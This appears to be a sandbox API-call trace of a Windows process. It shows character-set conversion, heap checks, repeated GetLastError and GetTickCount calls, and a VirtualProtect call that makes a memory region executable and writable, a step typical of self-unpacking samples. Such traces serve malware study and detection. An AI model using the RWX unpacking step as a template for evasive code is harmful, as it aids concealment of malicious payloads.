\x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ﷽﷽\\\蛝훈\臘") returned 256 [0057.636] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ﷽﷽\\\蛝훈\臘", cchWideChar=256, lpMultiByteStr=0x18fb34, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿH\x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02h\x02(\x02(\x02(\x02(\x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02H\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x81\x03\x81\x03\x81\x03\x81\x03\x81\x03\x81\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x82\x03\x82\x03\x82\x03\x82\x03\x82\x03\x82\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x10\x02\x10\x02\x10\x02\x10\x02 \x02", lpUsedDefaultChar=0x0) returned 256 [0057.636] HeapValidate (hHeap=0x9a0000, dwFlags=0x0, lpMem=0x9a1778) returned 1 [0057.637] HeapFree (in: hHeap=0x9a0000, dwFlags=0x0, lpMem=0x9a1778 | out: hHeap=0x9a0000) returned 1 [0057.637] HeapValidate (hHeap=0x9a0000, dwFlags=0x0, lpMem=0x9a1540) returned 1 [0057.637] HeapFree (in: hHeap=0x9a0000, dwFlags=0x0, lpMem=0x9a1540 | out: hHeap=0x9a0000) returned 1 [0057.637] GetLastError () returned 0x0 [0057.637] SetLastError (dwErrCode=0x0) [0057.637] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f92c, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0057.637] RtlAllocateHeap (HeapHandle=0x9a0000, Flags=0x0, Size=0x22c) returned 0x9a1540 [0057.637] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f92c, cbMultiByte=256, lpWideCharStr=0x9a1568, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ﷽﷽\\\㷝훈\臘") returned 256 [0057.637] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ﷽﷽\\\㷝훈\臘", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0057.637] RtlAllocateHeap (HeapHandle=0x9a0000, Flags=0x0, Size=0x22c) returned 0x9a1778 [0057.638] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ﷽﷽\\\믝퟈\臘ఀᕀ\x9a", cchSrc=256, lpDestStr=0x9a17a0, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸ﷽﷽\\\蛝훈\臘") returned 256 [0057.638] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸ﷽﷽\\\蛝훈\臘", cchWideChar=256, lpMultiByteStr=0x18fa34, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿH\x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02h\x02(\x02(\x02(\x02(\x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02H\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x81\x03\x81\x03\x81\x03\x81\x03\x81\x03\x81\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x82\x03\x82\x03\x82\x03\x82\x03\x82\x03\x82\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x10\x02\x10\x02\x10\x02\x10\x02 \x02", lpUsedDefaultChar=0x0) returned 256 [0057.638] HeapValidate (hHeap=0x9a0000, dwFlags=0x0, lpMem=0x9a1778) returned 1 [0057.638] HeapFree (in: hHeap=0x9a0000, dwFlags=0x0, lpMem=0x9a1778 | out: hHeap=0x9a0000) returned 1 [0057.638] HeapValidate (hHeap=0x9a0000, dwFlags=0x0, lpMem=0x9a1540) returned 1 [0057.638] HeapFree (in: hHeap=0x9a0000, dwFlags=0x0, lpMem=0x9a1540 | out: hHeap=0x9a0000) returned 1 [0057.639] RtlAllocateHeap (HeapHandle=0x9a0000, Flags=0x0, Size=0x824) returned 0x9a1540 [0057.639] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x42c660) returned 0x0 [0057.639] HeapValidate (hHeap=0x9a0000, dwFlags=0x0, lpMem=0x9a1240) returned 1 [0057.640] HeapValidate (hHeap=0x9a0000, dwFlags=0x0, lpMem=0x9a1240) returned 1 [0057.640] HeapValidate (hHeap=0x9a0000, dwFlags=0x0, lpMem=0x9a1240) returned 1 [0057.640] HeapValidate (hHeap=0x9a0000, dwFlags=0x0, lpMem=0x9a1240) returned 1 [0057.641] HeapValidate (hHeap=0x9a0000, dwFlags=0x0, lpMem=0x9a1240) returned 1 [0057.641] HeapValidate (hHeap=0x9a0000, dwFlags=0x0, lpMem=0x9a1240) returned 1 [0057.641] HeapValidate (hHeap=0x9a0000, dwFlags=0x0, lpMem=0x9a1240) returned 1 [0057.642] HeapValidate (hHeap=0x9a0000, dwFlags=0x0, lpMem=0x9a1240) returned 1 [0057.642] HeapValidate (hHeap=0x9a0000, dwFlags=0x0, lpMem=0x9a1240) returned 1 [0057.642] GetLastError () returned 0x0 [0057.642] GetLastError () returned 0x0 [0057.642] GetLastError () returned 0x0 [0057.642] GetLastError () returned 0x0 [0057.642] GetLastError () returned 0x0 [0057.642] GetLastError () returned 0x0 [0057.642] GetLastError () returned 0x0 [0057.642] GetLastError () returned 0x0 [0057.642] GetLastError () returned 0x0 [0057.642] GetLastError () returned 0x0 [0057.642] GetLastError () returned 0x0 [0057.642] GetLastError () returned 0x0 [0057.642] GetLastError () returned 0x0 [0057.642] GetLastError () returned 0x0 [0057.642] GetLastError () returned 0x0 [0057.642] GetLastError () returned 0x0 [0057.642] GetLastError () returned 0x0 [0057.642] GetLastError () returned 0x0 [0057.643] GetLastError () returned 0x0 [0057.643] GetLastError () returned 0x0 [0057.643] GetLastError () returned 0x0 [0057.643] GetLastError () returned 0x0 [0057.643] GetLastError () returned 0x0 [0057.643] GetLastError () returned 0x0 [0057.643] GetLastError () returned 0x0 [0057.643] GetLastError () returned 0x0 [0057.643] GetLastError () returned 0x0 [0057.643] GetLastError () returned 0x0 [0057.643] GetLastError () returned 0x0 [0057.643] GetLastError () returned 0x0 [0057.643] GetLastError () returned 0x0 [0057.643] GetLastError () returned 0x0 [0057.643] GetLastError () returned 0x0 [0057.643] GetLastError () returned 0x0 [0057.643] GetLastError () returned 0x0 [0057.643] GetLastError () returned 0x0 [0057.643] GetLastError () returned 0x0 [0057.643] GetLastError () returned 0x0 [0057.643] GetLastError () returned 0x0 [0057.643] GetLastError () returned 0x0 [0057.643] GetLastError () returned 0x0 [0057.643] GetLastError () returned 0x0 [0057.643] GetLastError () returned 0x0 [0057.643] GetLastError () returned 0x0 [0057.643] GetLastError () returned 0x0 [0057.643] GetLastError () returned 0x0 [0057.643] GetLastError () returned 0x0 [0057.643] GetLastError () returned 0x0 [0057.643] GetLastError () returned 0x0 [0057.643] GetLastError () returned 0x0 [0057.644] GetLastError () returned 0x0 [0057.644] GetLastError () returned 0x0 [0057.644] GetLastError () returned 0x0 [0057.644] GetLastError () returned 0x0 [0057.644] GetLastError () returned 0x0 [0057.644] GetLastError () returned 0x0 [0057.644] GetLastError () returned 0x0 [0057.644] GetLastError () returned 0x0 [0057.644] GetLastError () returned 0x0 [0057.644] GetLastError () returned 0x0 [0057.644] GetLastError () returned 0x0 [0057.644] GetLastError () returned 0x0 [0057.644] GetLastError () returned 0x0 [0057.644] GetLastError () returned 0x0 [0057.644] GetLastError () returned 0x0 [0057.644] GetLastError () returned 0x0 [0057.644] GetLastError () returned 0x0 [0057.644] GetLastError () returned 0x0 [0057.644] GetLastError () returned 0x0 [0057.644] GetLastError () returned 0x0 [0057.644] GetLastError () returned 0x0 [0057.644] GetLastError () returned 0x0 [0057.644] GetLastError () returned 0x0 [0057.644] GetLastError () returned 0x0 [0057.644] GetLastError () returned 0x0 [0057.644] GetLastError () returned 0x0 [0057.644] GetLastError () returned 0x0 [0057.644] GetLastError () returned 0x0 [0057.644] GetLastError () returned 0x0 [0057.644] GetLastError () returned 0x0 [0057.644] GetLastError () returned 0x0 [0057.644] GetLastError () returned 0x0 [0057.645] GetLastError () returned 0x0 [0057.645] GetLastError () returned 0x0 [0057.645] GetLastError () returned 0x0 [0057.645] GetLastError () returned 0x0 [0057.645] GetLastError () returned 0x0 [0057.645] GetLastError () returned 0x0 [0057.645] GetLastError () returned 0x0 [0057.645] GetLastError () returned 0x0 [0057.645] GetLastError () returned 0x0 [0057.645] GetLastError () returned 0x0 [0057.645] GetLastError () returned 0x0 [0057.645] GetLastError () returned 0x0 [0057.645] GetLastError () returned 0x0 [0057.645] GetLastError () returned 0x0 [0057.645] GetLastError () returned 0x0 [0057.645] GetLastError () returned 0x0 [0057.645] GetLastError () returned 0x0 [0057.645] GetLastError () returned 0x0 [0057.645] GetLastError () returned 0x0 [0057.645] GetLastError () returned 0x0 [0057.645] GetLastError () returned 0x0 [0057.645] GetLastError () returned 0x0 [0057.645] GetLastError () returned 0x0 [0057.645] GetLastError () returned 0x0 [0057.645] GetLastError () returned 0x0 [0057.645] GetLastError () returned 0x0 [0057.645] GetLastError () returned 0x0 [0057.645] GetLastError () returned 0x0 [0057.645] GetLastError () returned 0x0 [0057.645] GetLastError () returned 0x0 [0057.645] GetLastError () returned 0x0 [0057.645] GetLastError () returned 0x0 [0057.645] GetLastError () returned 0x0 [0057.646] GetLastError () returned 0x0 [0057.646] GetLastError () returned 0x0 [0057.646] GetLastError () returned 0x0 [0057.646] GetLastError () returned 0x0 [0057.646] GetLastError () returned 0x0 [0057.646] GetLastError () returned 0x0 [0057.646] GetLastError () returned 0x0 [0057.646] GetLastError () returned 0x0 [0057.646] GetLastError () returned 0x0 [0057.646] GetLastError () returned 0x0 [0057.646] GetLastError () returned 0x0 [0057.646] GetLastError () returned 0x0 [0057.646] GetLastError () returned 0x0 [0057.646] GetLastError () returned 0x0 [0057.646] GetLastError () returned 0x0 [0057.646] GetLastError () returned 0x0 [0057.646] GetLastError () returned 0x0 [0057.646] GetLastError () returned 0x0 [0057.646] GetLastError () returned 0x0 [0057.646] GetLastError () returned 0x0 [0057.646] GetLastError () returned 0x0 [0057.646] GetLastError () returned 0x0 [0057.646] GetLastError () returned 0x0 [0057.646] GetLastError () returned 0x0 [0057.646] GetLastError () returned 0x0 [0057.646] GetLastError () returned 0x0 [0057.646] GetLastError () returned 0x0 [0057.646] GetLastError () returned 0x0 [0057.646] GetLastError () returned 0x0 [0057.646] GetLastError () returned 0x0 [0057.646] GetLastError () returned 0x0 [0057.646] GetLastError () returned 0x0 [0057.646] GetLastError () returned 0x0 [0057.646] GetLastError () returned 0x0 [0057.646] GetLastError () returned 0x0 [0057.646] GetLastError () returned 0x0 [0057.647] GetLastError () returned 0x0 [0057.647] GetLastError () returned 0x0 [0057.647] GetLastError () returned 0x0 [0057.647] GetLastError () returned 0x0 [0057.647] GetLastError () returned 0x0 [0057.647] GetLastError () returned 0x0 [0057.647] GetLastError () returned 0x0 [0057.647] GetLastError () returned 0x0 [0057.647] GetLastError () returned 0x0 [0057.647] GetLastError () returned 0x0 [0057.647] GetLastError () returned 0x0 [0057.647] GetLastError () returned 0x0 [0057.647] GetLastError () returned 0x0 [0057.647] GetLastError () returned 0x0 [0057.647] GetLastError () returned 0x0 [0057.647] GetLastError () returned 0x0 [0057.647] GetLastError () returned 0x0 [0057.647] GetLastError () returned 0x0 [0057.647] GetLastError () returned 0x0 [0057.647] GetLastError () returned 0x0 [0057.647] GetLastError () returned 0x0 [0057.647] GetLastError () returned 0x0 [0057.647] GetLastError () returned 0x0 [0057.647] GetLastError () returned 0x0 [0057.647] GetLastError () returned 0x0 [0057.647] GetLastError () returned 0x0 [0057.647] GetLastError () returned 0x0 [0057.647] GetLastError () returned 0x0 [0057.647] GetLastError () returned 0x0 [0057.647] GetLastError () returned 0x0 [0057.647] GetLastError () returned 0x0 [0057.647] GetLastError () returned 0x0 [0057.647] GetLastError () returned 0x0 [0057.648] GetLastError () returned 0x0 [0057.648] GetLastError () returned 0x0 [0057.648] GetLastError () returned 0x0 [0057.648] GetLastError () returned 0x0 [0057.648] GetLastError () returned 0x0 [0057.648] GetLastError () returned 0x0 [0057.648] GetLastError () returned 0x0 [0057.648] GetLastError () returned 0x0 [0057.648] GetLastError () returned 0x0 [0057.648] GetLastError () returned 0x0 [0057.648] GetLastError () returned 0x0 [0057.648] GetLastError () returned 0x0 [0057.648] GetLastError () returned 0x0 [0057.648] GetLastError () returned 0x0 [0057.648] GetLastError () returned 0x0 [0057.648] GetLastError () returned 0x0 [0057.648] GetLastError () returned 0x0 [0057.648] GetLastError () returned 0x0 [0057.648] GetLastError () returned 0x0 [0057.648] GetLastError () returned 0x0 [0057.648] GetLastError () returned 0x0 [0057.648] GetLastError () returned 0x0 [0057.648] GetLastError () returned 0x0 [0057.648] GetLastError () returned 0x0 [0057.648] GetLastError () returned 0x0 [0057.648] GetLastError () returned 0x0 [0057.648] GetLastError () returned 0x0 [0057.648] GetLastError () returned 0x0 [0057.648] GetLastError () returned 0x0 [0057.648] GetLastError () returned 0x0 [0057.648] GetLastError () returned 0x0 [0057.648] GetLastError () returned 0x0 [0057.648] GetLastError () returned 0x0 [0057.648] GetLastError () returned 0x0 [0057.648] GetLastError () returned 0x0 [0057.648] GetLastError () returned 0x0 [0057.648] GetLastError () returned 0x0 [0057.648] GetLastError () returned 0x0 [0057.648] GetLastError () returned 0x0 [0057.648] GetLastError () returned 0x0 [0057.649] GetLastError () returned 0x0 [0057.649] GetLastError () returned 0x0 [0057.649] GetLastError () returned 0x0 [0057.649] GetLastError () returned 0x0 [0057.649] GetLastError () returned 0x0 [0057.649] GetLastError () returned 0x0 [0057.649] GetLastError () returned 0x0 [0057.649] GetLastError () returned 0x0 [0057.649] GetLastError () returned 0x0 [0057.649] GetLastError () returned 0x0 [0057.649] GetLastError () returned 0x0 [0057.649] GetLastError () returned 0x0 [0057.649] GetLastError () returned 0x0 [0057.649] GetLastError () returned 0x0 [0057.649] GetLastError () returned 0x0 [0057.649] GetLastError () returned 0x0 [0057.649] GetLastError () returned 0x0 [0057.649] GetLastError () returned 0x0 [0057.649] GetLastError () returned 0x0 [0057.649] GetLastError () returned 0x0 [0057.649] GetLastError () returned 0x0 [0057.649] GetLastError () returned 0x0 [0057.649] GetLastError () returned 0x0 [0057.649] GetLastError () returned 0x0 [0057.649] GetLastError () returned 0x0 [0059.498] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x769b0000 [0059.499] GetProcAddress (hModule=0x769b0000, lpProcName="VirtualProtect") returned 0x769c4317 [0059.500] VirtualProtect (in: lpAddress=0x6cf258, dwSize=0xf4b0, flNewProtect=0x40, lpflOldProtect=0x18dbd8 | out: lpflOldProtect=0x18dbd8*=0x4) returned 1 [0059.519] GetTickCount () returned 0x1d3b054 [0059.519] SetLastError (dwErrCode=0x0) [0059.519] GetTickCount () returned 0x1d3b054 [0059.519] SetLastError (dwErrCode=0x0) [0059.519] GetTickCount () returned 0x1d3b054 [0059.519] SetLastError (dwErrCode=0x0) [0059.519] GetTickCount () returned 0x1d3b054 [0059.519] SetLastError (dwErrCode=0x0) [0059.519] GetTickCount () returned 0x1d3b054 [0059.519] SetLastError (dwErrCode=0x0) [0059.519] GetTickCount () returned 0x1d3b054 [0059.519] SetLastError (dwErrCode=0x0) [0059.519] GetTickCount () returned 0x1d3b054 [0059.519] SetLastError (dwErrCode=0x0) [0059.519] GetTickCount () returned 0x1d3b054 [0059.519] SetLastError (dwErrCode=0x0) [0059.519] GetTickCount () returned 0x1d3b054 [0059.519] SetLastError (dwErrCode=0x0) [0059.519] GetTickCount () returned 0x1d3b054 [0059.519] SetLastError (dwErrCode=0x0) [0059.520] GetTickCount () returned 0x1d3b054 [0059.520] SetLastError (dwErrCode=0x0) [0059.520] GetTickCount () returned 0x1d3b054 [0059.520] SetLastError (dwErrCode=0x0) [0059.520] GetTickCount () returned 0x1d3b054 [0059.520] SetLastError (dwErrCode=0x0) [0059.520] GetTickCount () returned 0x1d3b054 [0059.520] SetLastError (dwErrCode=0x0) [0059.520] GetTickCount () returned 0x1d3b054 [0059.520] SetLastError (dwErrCode=0x0) [0059.520] GetTickCount () returned 0x1d3b054 [0059.520] SetLastError (dwErrCode=0x0) [0059.520] GetTickCount () returned 0x1d3b054 [0059.520] SetLastError (dwErrCode=0x0) [0059.520] GetTickCount () returned 0x1d3b054 [0059.520] SetLastError (dwErrCode=0x0) [0059.520] GetTickCount () returned 0x1d3b054 [0059.520] SetLastError (dwErrCode=0x0) [0059.520] GetTickCount () returned 0x1d3b054 [0059.520] SetLastError (dwErrCode=0x0) [0059.520] GetTickCount () returned 0x1d3b054 [0059.520] SetLastError (dwErrCode=0x0) [0059.520] GetTickCount () returned 0x1d3b054 [0059.520] SetLastError (dwErrCode=0x0) [0059.520] GetTickCount () returned 0x1d3b054 [0059.520] SetLastError (dwErrCode=0x0) [0059.520] GetTickCount () returned 0x1d3b054 [0059.520] SetLastError (dwErrCode=0x0) [0059.521] GetTickCount () returned 0x1d3b054 [0059.521] SetLastError (dwErrCode=0x0) [0059.521] GetTickCount () returned 0x1d3b054 [0059.521] SetLastError (dwErrCode=0x0) [0059.521] GetTickCount () returned 0x1d3b054 [0059.521] SetLastError (dwErrCode=0x0) [0059.521] GetTickCount () returned 0x1d3b054 [0059.521] SetLastError (dwErrCode=0x0) [0059.521] GetTickCount () returned 0x1d3b054 [0059.521] SetLastError (dwErrCode=0x0) [0059.521] GetTickCount () returned 0x1d3b054 [0059.521] SetLastError (dwErrCode=0x0) [0059.521] GetTickCount () returned 0x1d3b054 [0059.521] SetLastError (dwErrCode=0x0) [0059.521] GetTickCount () returned 0x1d3b054 [0059.521] SetLastError (dwErrCode=0x0) [0059.521] GetTickCount () returned 0x1d3b054 [0059.521] SetLastError (dwErrCode=0x0) [0059.521] GetTickCount () returned 0x1d3b054 [0059.521] SetLastError (dwErrCode=0x0) [0059.521] GetTickCount () returned 0x1d3b054 [0059.521] SetLastError (dwErrCode=0x0) [0059.521] GetTickCount () returned 0x1d3b054 [0059.521] SetLastError (dwErrCode=0x0) [0059.521] GetTickCount () returned 0x1d3b054 [0059.521] SetLastError (dwErrCode=0x0) [0059.521] GetTickCount () returned 0x1d3b054 [0059.521] SetLastError (dwErrCode=0x0) [0059.521] GetTickCount () returned 0x1d3b054 [0059.521] SetLastError (dwErrCode=0x0) [0059.521] GetTickCount () returned 0x1d3b054 [0059.521] SetLastError (dwErrCode=0x0) [0059.521] GetTickCount () returned 0x1d3b054 [0059.522] SetLastError (dwErrCode=0x0) [0059.522] GetTickCount () returned 0x1d3b054 [0059.522] SetLastError (dwErrCode=0x0) [0059.522] GetTickCount () returned 0x1d3b054 [0059.522] SetLastError (dwErrCode=0x0) [0059.522] GetTickCount () returned 0x1d3b054 [0059.522] SetLastError (dwErrCode=0x0) [0059.522] GetTickCount () returned 0x1d3b054 [0059.522] SetLastError (dwErrCode=0x0) [0059.522] GetTickCount () returned 0x1d3b054 [0059.522] SetLastError (dwErrCode=0x0) [0059.522] GetTickCount () returned 0x1d3b054 [0059.522] SetLastError (dwErrCode=0x0) [0059.522] GetTickCount () returned 0x1d3b054 [0059.522] SetLastError (dwErrCode=0x0) [0059.522] GetTickCount () returned 0x1d3b054 [0059.522] SetLastError (dwErrCode=0x0) [0059.522] GetTickCount () returned 0x1d3b054 [0059.522] SetLastError (dwErrCode=0x0) [0059.522] GetTickCount () returned 0x1d3b054 [0059.522] SetLastError (dwErrCode=0x0) [0059.522] GetTickCount () returned 0x1d3b054 [0059.522] SetLastError (dwErrCode=0x0) [0059.522] GetTickCount () returned 0x1d3b054 [0059.522] SetLastError (dwErrCode=0x0) [0059.522] GetTickCount () returned 0x1d3b054 [0059.522] SetLastError (dwErrCode=0x0) [0059.522] GetTickCount () returned 0x1d3b054 [0059.522] 